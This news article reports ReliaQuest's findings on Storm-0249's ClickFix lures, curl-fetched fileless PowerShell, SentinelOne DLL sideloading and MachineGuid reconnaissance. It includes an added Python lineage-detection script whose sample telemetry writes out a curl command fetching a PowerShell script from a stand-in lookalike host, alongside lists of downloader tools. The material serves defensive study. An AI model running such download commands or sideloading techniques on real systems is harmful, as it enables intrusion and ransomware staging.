
The threat actor known as Storm-0249 appears to be moving beyond its role as an initial access broker, combining more sophisticated tactics such as domain spoofing, DLL sideloading, and fileless PowerShell execution to facilitate ransomware attacks.
“These techniques allow them to evade defenses, penetrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News.
Storm-0249 is the name Microsoft assigned to an initial access broker that has sold footholds in victim organizations to other cybercrime groups, including ransomware and extortion crews such as Storm-0501. Microsoft first reported the activity in September 2024.

Then, earlier this year, Microsoft also disclosed details of a phishing campaign run by the threat actor. The campaign used tax-related themes to target users in the United States ahead of the tax filing season and infected them with the Latrodectus and BruteRatel C4 (BRc4) post-exploitation frameworks.
The ultimate goal of these infections is to obtain persistent access to enterprise networks and monetize it by selling it to ransomware gangs, handing them ready-made targets and accelerating the pace of such attacks.
ReliaQuest’s latest findings point to a change in tactics. Storm-0249 uses the infamous ClickFix social engineering technique, under the pretext of resolving a technical issue, to trick potential targets into pasting and executing malicious commands in the Windows Run dialog.
In this case, the copied command uses the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain (“sgcipl[.]com/us.microsoft.com/bdo/”) to give the victim a false sense of trust, and then runs the script filelessly via PowerShell.
This executes a malicious MSI package with SYSTEM privileges and drops a trojanized DLL associated with SentinelOne’s endpoint security solution (‘SentinelAgentCore.dll’) into the user’s AppData folder alongside the legitimate ‘SentinelAgentWorker.exe’ executable.
The idea is to sideload the malicious DLL when the ‘SentinelAgentWorker.exe’ process starts, so that the activity is hidden behind a trusted, signed process. The DLL then establishes encrypted communication with a command-and-control (C2) server.
Storm-0249 has also been observed leveraging legitimate Windows administrative utilities such as reg.exe and findstr.exe to extract unique system identifiers such as MachineGuid, laying the foundation for subsequent ransomware attacks. The use of living-off-the-land (LotL) tactics and the fact that these commands are executed under the trusted “SentinelAgentWorker.exe” process means that this activity is unlikely to raise any red flags.
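The chain described above (a downloader launched from the Run dialog, a security-agent binary staged in AppData, and reg.exe/findstr.exe reading MachineGuid beneath that process) lends itself to process-lineage detections rather than hash matching. The Python below is an added example, not code from ReliaQuest, SentinelOne or The Hacker News: the event schema, rule names, sample telemetry, the install path and the lookalike domain `lookalike.example` are constructed, and the downloader list generalizes slightly beyond the curl.exe case on the page.

```python
"""Process-lineage triage for the ClickFix -> sideload -> MachineGuid chain.

Added example: the field names (pid, ppid, image, cmd), rule names and the
sample events are constructed for illustration and are not real telemetry.
"""
import re

# Agent binaries worth watching when they run outside the vendor's install
# path. SentinelAgentWorker.exe is named in the report; the set is ours.
AGENT_BINARIES = {"sentinelagentworker.exe"}

# Roots where vendor software legitimately lives (assumption of this example).
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")

# Path fragments that indicate a user-writable staging location.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\")

# curl.exe is the downloader on the page; the others generalize the rule.
DOWNLOADERS = {"curl.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://", re.I)
MACHINEGUID_RE = re.compile(r"machineguid", re.I)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev, by_pid, max_depth=8):
    """Yield ancestor events nearest-first; stop at unknown pids or a loop."""
    seen = set()
    cur = by_pid.get(ev["ppid"])
    while cur is not None and cur["pid"] not in seen and len(seen) < max_depth:
        seen.add(cur["pid"])
        yield cur
        cur = by_pid.get(cur["ppid"])


def triage_event(ev, by_pid):
    """Return the set of rule names the event triggers (empty if benign)."""
    tags = set()
    image = ev["image"].lower()
    name = basename(image)
    cmd = ev["cmd"]
    parent = by_pid.get(ev["ppid"])
    parent_name = basename(parent["image"]) if parent else ""

    # 1. ClickFix lure: processes started from the Run dialog are children of
    #    explorer.exe; a downloader there with a URL on its command line is odd.
    if name in DOWNLOADERS and parent_name == "explorer.exe" and URL_RE.search(cmd):
        tags.add("clickfix_downloader_from_shell")

    # 2. Sideloading setup: a known agent binary running outside vendor paths,
    #    escalated when the path is user-writable (AppData in the report).
    if name in AGENT_BINARIES and not image.startswith(TRUSTED_ROOTS):
        tags.add("security_agent_in_untrusted_path")
        if any(marker in image for marker in USER_WRITABLE):
            tags.add("security_agent_in_user_writable_path")

    # 3. Recon: MachineGuid read via reg.exe/findstr.exe. Admins do this too,
    #    so only the lineage under an agent binary lifts the severity.
    if name in {"reg.exe", "findstr.exe"} and MACHINEGUID_RE.search(cmd):
        tags.add("machineguid_query")
        if any(basename(a["image"]) in AGENT_BINARIES for a in ancestors(ev, by_pid)):
            tags.add("machineguid_query_under_agent_lineage")
    return tags


def triage(events):
    """Map pid -> sorted rule names for every event that triggered a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = {}
    for e in events:
        tags = triage_event(e, by_pid)
        if tags:
            findings[e["pid"]] = sorted(tags)
    return findings


# Constructed sample telemetry mirroring the reported chain plus two benign cases.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -o %TEMP%\u.ps1 https://lookalike.example/us.microsoft.com/bdo/"},
    {"pid": 300, "ppid": 1, "image": r"C:\Windows\System32\msiexec.exe", "cmd": "msiexec.exe /V"},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Users\alice\AppData\Roaming\bdo\SentinelAgentWorker.exe",
     "cmd": "SentinelAgentWorker.exe"},
    {"pid": 450, "ppid": 400, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 500, "ppid": 450, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
    {"pid": 501, "ppid": 450, "image": r"C:\Windows\System32\findstr.exe",
     "cmd": "findstr /i MachineGuid"},
    # Benign: the vendor's own agent under a (constructed) install directory.
    {"pid": 600, "ppid": 4, "image": r"C:\Program Files\SentinelOne\Agent\SentinelAgentWorker.exe",
     "cmd": "SentinelAgentWorker.exe"},
    # Low severity: an administrator reading MachineGuid from a console.
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},
    {"pid": 701, "ppid": 700, "image": r"C:\Windows\System32\reg.exe",
     "cmd": r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
]

if __name__ == "__main__":
    for pid, tags in triage(SAMPLE_EVENTS).items():
        print(pid, tags)
```

The MachineGuid read on its own is ordinary administration and would drown an analyst in alerts; the rule only escalates when the ancestry contains an agent binary, which is exactly the trust relationship the report says the actor abuses. The same lineage walk is what lets the untrusted-path rule fire on the staged copy in AppData while the vendor's real agent under Program Files stays quiet.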

This finding marks a shift from large-scale phishing campaigns to precision attacks that weaponize trust associated with signed processes to increase stealth.
“This is not just general reconnaissance, but preparation for ransomware affiliates,” ReliaQuest said. “Ransomware groups such as LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.”
“By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binaries or attempt to reverse engineer the encryption algorithms, they will not be able to decrypt the files without the attacker-controlled keys.”
